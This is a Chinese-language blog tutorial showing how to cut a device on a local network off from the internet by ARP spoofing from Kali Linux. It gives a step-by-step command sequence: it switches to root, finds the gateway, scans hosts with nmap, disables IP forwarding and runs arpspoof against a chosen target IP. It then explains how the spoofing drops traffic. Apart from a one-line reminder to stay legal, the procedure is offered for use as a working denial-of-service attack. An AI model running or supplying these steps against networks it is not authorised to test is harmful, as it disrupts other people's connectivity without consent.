ARP欺骗使局域网内设备断网

一、实验准备

  1. kali系统:可使用虚拟机软件模拟

    kali虚拟机镜像链接:https://www.kali.org/get-kali/#kali-virtual-machines

    注意虚拟机网络适配器采用桥接模式

  2. 局域网内存在指定断网的设备

二、实验步骤

  1. 打开kali系统命令行:ctrl+alt+t可快速打开终端

  2. 切换到root用户

    bash 复制代码
    sudo su
  3. 查看当前网段

    bash 复制代码
    ifconfig

    inet 192.168.10.145 netmask 255.255.255.0

    表明当前网段为192.168.10.0

  4. 查看当前路由器ip地址

    bash 复制代码
    ip route

    default via 192.168.10.1 dev eth0 proto dhcp src 192.168.10.145 metric 100

    192.168.10.0/24 dev eth0 proto kernel scope link src 192.168.10.145 metric 10

    表明路由器ip为192.168.10.1

  5. 扫描查看目标设备ip

    bash 复制代码
    nmap -sn 192.168.10.1/24  # 使用 Nmap 发现网络中的活动主机,等效于nmap -sn 192.168.10.1-255

    根据设备名称找到对应ip

  6. 设置kali系统不转发数据

    bash 复制代码
    echo 0 > /proc/sys/net/ipv4/ip_forward
  7. 执行arp欺骗

    bash 复制代码
    arpspoof -i eth0 -t 192.168.10.137 -r 192.168.10.1
    • -i: 指定使用的网卡
    • -t:指定欺骗的设备ip地址
    • -r:指定欺骗的路由器ip地址
  8. 目标设备无法获取新数据

三、原理

ARP欺骗

  1. 复制路由器mac地址,伪装为路由器并通知目标设备,以便后续目标设备将数据交给kali
  2. 复制目标设备mac地址,伪装为目标设备并通知路由器,以便后续路由器将数据交给kali
  3. 但kali设置不转发数据,因此路由器和目标设备发送至kali的所有数据均被抛弃,致使目标设备无法与路由器沟通无法获取数据

四、特别注意

请在合法场景下进行实验

相关推荐
TeYiToKu6 分钟前
笔记整理—linux驱动开发部分(9)framebuffer驱动框架
linux·c语言·arm开发·驱动开发·笔记·嵌入式硬件·arm
dsywws9 分钟前
Linux学习笔记之时间日期和查找和解压缩指令
linux·笔记·学习
yeyuningzi17 分钟前
Debian 12环境里部署nginx步骤记录
linux·运维·服务器
上辈子杀猪这辈子学IT35 分钟前
【Zookeeper集群搭建】安装zookeeper、zookeeper集群配置、zookeeper启动与关闭、zookeeper的shell命令操作
linux·hadoop·zookeeper·centos·debian
minihuabei40 分钟前
linux centos 安装redis
linux·redis·centos
lldhsds2 小时前
书生大模型实战营第四期-入门岛-1. Linux前置基础
linux
wowocpp2 小时前
ubuntu 22.04 硬件配置 查看 显卡
linux·运维·ubuntu
山河君2 小时前
ubuntu使用DeepSpeech进行语音识别(包含交叉编译)
linux·ubuntu·语音识别
鹏大师运维2 小时前
【功能介绍】信创终端系统上各WPS版本的授权差异
linux·wps·授权·麒麟·国产操作系统·1024程序员节·统信uos
筱源源2 小时前
Elasticsearch-linux环境部署
linux·elasticsearch